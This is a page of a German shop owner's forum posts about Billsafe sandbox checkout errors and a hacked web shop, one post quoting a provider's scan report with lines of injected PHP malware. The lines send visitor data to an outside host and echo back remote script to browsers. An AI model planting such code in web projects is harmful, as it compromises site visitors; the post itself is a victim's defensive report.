Beiträge von Andrea

    zum Test habe ich mir den Shop nochmal neu runtergeladen (v2next 2.5.10) und in einen Unterordner hochgeladen und das Modul "billsafe_3_invoice" installiert - sandbox aktiviert - ID und Licence eingetragen - und eine Bestellung mit Paul Positiv durchgeführt. Ergebnis: genau das gleiche.
    Folgende Tabellen sind vorhanden: billsafe_directpayments (ist leer), billsafe_paymentinfo (ist leer), billsafe_products_shipped (ist leer), orders_billsafe (da ist die Bestellung drin).
    Ansonsten genau dasselbe Problem - Abfrage wird abgebrochen aber Bestellung im Backend und bei Billsafe vorhanden - im Backend allerdings kein "Billsafe Details Button".

    man hat eine VID und eine Lizenznummer und die stimmen und sind auch korrekt hinterlegt. Die Testbestellungen landen ja auch bei Billsafe und auch im Shop aber es kommt halt immer diese Meldung und im Shop Backend wo die Testbestellung zwar drin ist, fehlt der Button mit den Billsafe-Details.

    habe deine Datei mit meiner vergleichen und sie sind gleich. habe es jetzt nochmal versucht mit aktivem payment-layer - da bekomme ich dann bei der "checkout_billsafe.php" den layer wo ich nochmal das Geburtsdatum eintragen muss und den Kauf bestätigen muss und als nächstes wird ein "token" an die "checkout_billsafe.php" angehängt und da habe ich die Fehlernachricht.

    kein wordpress - nirgendwo. tja, und der ecb shop war so alt - da gab es schon ewig keine updates dafür.
    habe jetzt auch mit meinem provider telefoniert und eine der infizierten php - dateien prüfen lassen und der hat es dann auch gefunden und sagte das es am 19ten eingespielt wurde aber du hast mich schon am 18ten gewarnt.

    und das
    Changed -> 29.08.2014 03:47:46 +0200

    bedeutet nur soviel das um diese uhrzeit der provider meines bekannten die infizierten dateien entdeckt hat und die seite gesperrt - ist jetzt aber wieder frei nachdem ich den code von den dateien entfernt habe.

    ich habe jetzt mal alle ftp-passwörter und sql-passwörter geändert. ob das reichen wird ist fraglich.
    mein pc ist jedenfalls sauber.

    ne nur eine webspace.
    witzig ist ja...den shop habe ich ja auf meiner domain (auch webspace) fertig gemacht und liegt danoch und ist auch immernoch aufrufbar.
    vor zwei tagen dann auf seine domain hochgeladen (auch webspace) und da nicht mehr aufrufbar.

    und noch was....nachdem ich nun alle infizierten dateien mit den original dateien verglichen habe, muss ich feststellen, das von seinem provider auch dateien beanstandet wurden, die im vergleich zum original nicht verändert wurden wie zb. folgendes:

    Changed -> 29.08.2014 03:47:46 +0200
    Zeile -> SuchMuster -> FUND (Max. 300 Zeichen, gekuerzt, escaped..., angezeigt maximal: 20)
    598 -> WARNING: Port Binding -> \$this-\>debug\("getOperationscheckingport\$portbindingType".\$portData\['bindingType'\]\)\;
    602 -> WARNING: Port Binding -> \$this-\>debug\("getOperationsfoundport\$portbindingType\$bindingType"\)\;

    folgendes...der Shop (bzw. die Domain) eines Freundes war infiziert ....war ein alter ecb-shop drauf - also neuen shop gemacht (v2next) und diese woche von do auf fr nacht auf den server geladen.....alles war soweit ok bis jetzt...nun ist die seite nicht verfügbar und der provider hat eine infiziert.txt - Datei in den shop-Ordner gelegt wo jetzt zb. folgendes drin steht:

    Changed -> 29.08.2014 00:25:46 +0200
    Zeile -> SuchMuster -> FUND (Max. 300 Zeichen, gekuerzt, escaped..., angezeigt maximal: 20)
    32 -> error_reporting(0); ini... -> error_reporting\(0\)\;ini_set\('display_errors',0\)\;\$wp_ob80=@\$_SERVER\['HTTP_USER_AGENT'\]\;
    33 -> if (( preg_match ('/Gec... -> if\(\(preg_match\('/Gecko\|MSIE/i',\$wp_ob80\)\&\&!preg_match\('/bot/i',\$wp_ob80\)\)\)\{
    33 -> if (( preg_match (./Gec... -> if\(\(preg_match\('/Gecko\|MSIE/i',\$wp_ob80\)\&\&!preg_match\('/bot/i',\$wp_ob80\)\)\)\{
    33 -> if (( preg_match (./Gec... -> if\(\(preg_match\('/Gecko\|MSIE/i',\$wp_ob80\)\&\&!preg_match\('/bot/i',\$wp_ob80\)\)\)\{
    34 -> "http://".".*".".*"."..... -> \$wp_ob0980="http://"."html"."string".".com/string"."/\?ip=".\$_SERVER\['REMOTE_ADDR'\]."\&referer=".urlencode\(\$_SERVER\['HTTP_HOST'\]\)."\&ua=".urlencode\(\$wp_ob80\)\;
    34 -> $wp_.*="http://.*?ip=.*... -> \$wp_ob0980="http://"."html"."string".".com/string"."/\?ip=".\$_SERVER\['REMOTE_ADDR'\]."\&referer=".urlencode\(\$_SERVER\['HTTP_HOST'\]\)."\&ua=".urlencode\(\$wp_ob80\)\;
    36 -> curl_setopt ($.*, CURLO... -> curl_setopt\(\$ch,CURLOPT_TIMEOUT,6\)\;curl_setopt\(\$ch,CURLOPT_RETURNTRANSFER,1\)\;\$wp_80ob=curl_exec\(\$ch\)\;curl_close\(\$ch\)\;\}
    37 -> if ( substr(.*,.*,.*) =... -> if\(substr\(\$wp_80ob,1,3\)==='scr'\)\{echo\$wp_80ob\;\}
    37 -> if ( substr($wp_.*,.*,.... -> if\(substr\(\$wp_80ob,1,3\)==='scr'\)\{echo\$wp_80ob\;\}

    nun werde ich das alles löschen, also die texte aus den betroffenen dateien aber meine frage ist..

    wie kann ich das in zukunft vermeiden?

    der provider meinte nur soviel wie "das käme öfter vor bei seinen kunden, deshalb sollte man immer seine software auf dem neuesten stand halten usw. und wenn eine domain im visier sei, dann würden sie da halt auch immer eine lücke finden"...was soll ich denn mit der aussage anfangen?

    nachdem ich auf "zahlungspflichtig bestellen" klicke, komme ich zur Billsafe Sandbox Vorschau und nachdem ich da den Button "Rechnungskauf bestätigen" klicke, kommt eine weiße Seite mit dem Text "Die Abfrage wurde abgebrochen, kontaktieren Sie den Administrator..." - keine weitere Info

    Hallo, Billsafe im Testmodus beim Kauf mit Paul Positiv kam folgender Text "Die Abfrage wurde abgebrochen, kontaktieren Sie den Administrator..."
    Die Bestellung ist allerdings beim Billsafe Händlerportal zu finden und im Shop Backend auch - allerdings ohne den Button "Billsafe Details".

    Wieso kommt der Text "Die Abfrage wurde abgebrochen, kontaktieren Sie den Administrator..."?